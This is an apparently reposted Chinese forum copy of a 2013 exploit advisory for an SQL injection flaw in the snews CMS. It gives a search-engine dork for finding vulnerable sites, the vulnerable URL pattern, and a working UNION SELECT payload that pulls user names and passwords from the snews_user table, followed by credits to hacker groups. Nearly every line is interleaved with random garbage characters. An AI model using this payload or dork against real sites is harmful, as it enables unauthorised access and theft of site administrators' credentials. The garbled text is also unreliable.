标题: CMS snews SQL Injection Vulnerability& @1 [9 s+ \/ y) w2 }9 j' \
作者: By onestree0 m8 c1 Z5 N2 _) K* _
下载地址 : http://snewscms.com/: N# U3 a3 g9 N8 O( l
测试平台 : ubuntu 12.10 / win 75 A' a, d4 z! q8 f6 m# `
关键词: inurl:"tanyakan pada rumput yang bergoyang"7 |$ ? v: {& R {2 I8 c( ~
4 q. u. ~) z6 R- ]( {
G" l" p& v9 v( m*************************************************************
) P5 q( ]7 C# o! m% g # t! b8 ^/ G, t3 r8 v+ P
SQL poc:. o! p5 T7 o1 C
7 T4 D% s; J, S
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]: {! }4 H8 i4 L9 Q% h7 |
# C# O; u0 h* i! g# p示例
, _- S5 ?2 b" Q- C$ E
0 D4 u8 I: X _7 ?http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
6 t) w: F& g" S3 X# i+ u - L$ j Y, I" J% T& y0 x/ C
" ^" |4 T( d# g! B+ E致谢:
9 [8 G) U$ ^+ Y; E8 E8 w
5 e* b: @ ~! K- l G6 F Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell B0 `" c! H1 v/ F; p5 U
' w& E% G6 \0 }4 [* g: T5 l indonesiancoder - moeslimh4x0r - go-coder4 `& {/ Z: _% s+ t
; }1 Z; _3 ?0 `9 Ispesial my hunny :*
. L8 {! I7 O4 \ |
发表于 2013-1-23 08:55:06
收藏
支持
反对